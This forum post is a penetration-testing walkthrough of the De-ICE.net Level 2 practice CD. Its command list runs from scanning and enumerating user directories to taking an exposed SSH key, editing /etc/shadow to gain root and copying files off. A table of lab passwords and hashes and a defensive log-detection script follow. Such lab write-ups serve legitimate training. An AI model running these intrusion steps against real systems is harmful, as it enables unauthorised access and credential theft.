
Thread: [Video] De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}


  1. #1
    g0tmi1k (Moderator)

    [Video] Attacking - De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/3194808
    Download video: http://www.mediafire.com/?fy5867do96xmzao

    What is this?
    This is my walkthrough of how I broke into the De-ICE.net network, level 2, disk 1.
    The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.


    What do I need?

    > BackTrack 4 (Final)
    > de-ice.net-2.100-1.1.iso (MD5: 09798f85bf54a666fbab947300f38163)
    > Dictionary(s)


    Software
    Name: De-ICE.net
    Version: 2.0 (Level 1 - Disk 2 - IP Address: 1.100)
    Home Page: http://www.de-ice.net or http://heorot.net/livecds/
    Download Link:





    Forums/Support: http://forums.heorot.net and http://forums.heorot.net/viewtopic.php?f=18&t=16
    WiKi/Support: http://de-ice.net/hackerpedia/index...._PenTest_Disks


    Commands:
    Code:
    nmap -n 192.168.2.1-255
    
    nmap -n -sV -sS -O 192.168.2.100
    
    nmap -n -sV -sS -O 192.168.2.101
    
    firefox 192.168.2.100
    
    [+]kate -> list of possible usernames. Save. Filename: usernames.txt
    
    firefox 192.168.2.101
    
    [+]BackTrack -> Vulnerability Identification -> Fuzzers -> JBroFuzz. Web Directories -> List of usernames (+ root, admin) with '~' in front. -> http://192.168.2.101 -> 80
    
    
    
    firefox http://192.168.2.101/~pirrip
    
    [+]kate -> Update usernames with the ones which we got a response from. Save.
    
    [+]BackTrack -> Web Application Analysis -> Web (frontend) -> nikto2
    
    ./nikto.pl -host 192.168.2.101 -r ~pirrip/ -Display 124
    
    firefox http://192.168.2.101/~pirrip/.ssh
    
    // Save both files
    
    mv /root/id_rsa /root/.ssh/id_rsa
    
    mv /root/id_rsa.pub /root/.ssh/id_rsa.pub
    
    chmod 000 /root/.ssh/id_rsa
    
    chmod 000 /root/.ssh/id_rsa.pub
    
    ssh pirrip@192.168.2.100
    // Yes
    
    mailx
    // 3 - we see that havisham's password is 'changeme'. 7 - we see pirrip's password is '0l1v3rTw1st'
    
    cd /etc/
    
    vi passwd
    
    // kate -> Update usernames with only valid ones.
    
    vi group
    
    sudo vi shadow
    // edit (D, :22,22y, :put, i, root, ESCape, ESCape, d + [->],[up],d d). Save it (:w), exit (:q). Password: 0l1v3rTw1st
    
    su
    // Password: 0l1v3rTw1st
    
    cd /root/
    
    ls -a
    
    cd .save/
    
    ls -a
    
    chmod -R 777 /root/
    
    //In BackTrack//
    
    scp pirrip@192.168.2.100:/root/.save/great_expectations.zip /root/
    
    unzip great_expectations.zip
    
    tar xf great_expectations.tar
    
    strings Jan08
    
    //In SSH//
    sudo vi /var/mail/havisham
    
    modprobe capability
    
    //In BackTrack//
    ftp 192.168.2.100
    // Username: pirrip. Password: 0l1v3rTw1st //
    
    ls -a
    
    //In SSH//
    
    exit
    
    
    //In BackTrack//
    
    [+]Firefox -> Send a REAL email to: philip.pirrip.ge@gmail.com
    // GAME OVER
    
    
    
    ----------------------------------------------------------------------------------------------------
    Users
    root:P1ckw1ckP@p3rs     root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
    havisham:changeme       havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
    pirrip:0l1v3rTw1st      pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
    magwitch:               magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
    ----------------------------------------------------------------------------------------------------
    Notes:
    Song: Ashley Wallbridge - Masquerade (Original Mix)
    Video length: 09:07
    Capture length: 30:35

    Blog Post: http://g0tmi1k.blogspot.com/2010/02/...-2-disk-1.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1663-%5Bvideo%5D-de-ice-net-v2-0-1-100-%7Blevel-2-disk-1%7D.html#post5679 OR http://heorot.net/forums/viewtopic.php?f=18&t=368
    Dictionaries: http://g0tmi1k.blogspot.com/2010/02/...tionaries.html
    Last edited by g0tmi1k; 03-05-2011 at 05:23 PM.
    Have you...g0tmi1k?
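
The web-side steps in the post above (probing `~username` directories, then downloading files from `/~pirrip/.ssh`) leave a clear trail in the web server's access log. The following detection sketch is an added example, not part of the original post; it assumes Apache common/combined log format, and the function name `analyse`, the threshold of 5 and the sample log lines (including the two client addresses) are constructed for illustration.

```python
import re
from collections import defaultdict

# Apache common/combined log line: client, request path and status are captured.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD|POST) (\S+)[^"]*" (\d{3})')
# mod_userdir style path: /~name followed by an optional sub-path.
USERDIR_RE = re.compile(r'^/~([^/?]+)(/[^?]*)?')

# Constructed sample lines; 192.168.2.50 and 192.168.2.51 are made-up clients.
TS = '[05/Mar/2010:10:00:00 +0000]'
SAMPLE_LOG = [
    f'192.168.2.50 - - {TS} "GET /~root HTTP/1.1" 404 210',
    f'192.168.2.50 - - {TS} "GET /~admin HTTP/1.1" 404 210',
    f'192.168.2.50 - - {TS} "GET /~havisham HTTP/1.1" 404 210',
    f'192.168.2.50 - - {TS} "GET /~magwitch HTTP/1.1" 404 210',
    f'192.168.2.50 - - {TS} "GET /~pirrip HTTP/1.1" 301 320',
    f'192.168.2.51 - - {TS} "GET /~pirrip/ HTTP/1.1" 200 1532',
    f'192.168.2.50 - - {TS} "GET /~pirrip/.ssh/ HTTP/1.1" 200 950',
    f'192.168.2.50 - - {TS} "GET /~pirrip/.ssh/id_rsa HTTP/1.1" 200 1675',
    f'192.168.2.51 - - {TS} "GET /index.html HTTP/1.1" 200 4021',
]

def analyse(lines, enum_threshold=5):
    """Return (enumerators, key_fetches) found in access-log lines."""
    probed = defaultdict(set)  # client -> distinct ~names it requested
    key_fetches = []           # (client, path) for 2xx answers under /~name/.ssh
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue           # skip lines that are not in the expected format
        client, path, status = m.group(1), m.group(2), int(m.group(3))
        u = USERDIR_RE.match(path)
        if not u:
            continue           # not a per-user directory request
        probed[client].add(u.group(1))
        rest = u.group(2) or ""
        if 200 <= status < 300 and (rest == "/.ssh" or rest.startswith("/.ssh/")):
            key_fetches.append((client, path))
    # A client that asks for many different ~names is enumerating accounts.
    enumerators = {c: sorted(n) for c, n in probed.items() if len(n) >= enum_threshold}
    return enumerators, key_fetches

if __name__ == "__main__":
    enumerators, key_fetches = analyse(SAMPLE_LOG)
    for client, names in enumerators.items():
        print(f"userdir enumeration from {client}: {', '.join(names)}")
    for client, path in key_fetches:
        print(f"served from a .ssh directory to {client}: {path}")
```

Any 2xx answer for a path under `/.ssh` is worth alerting on by itself, whatever the client did beforehand.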
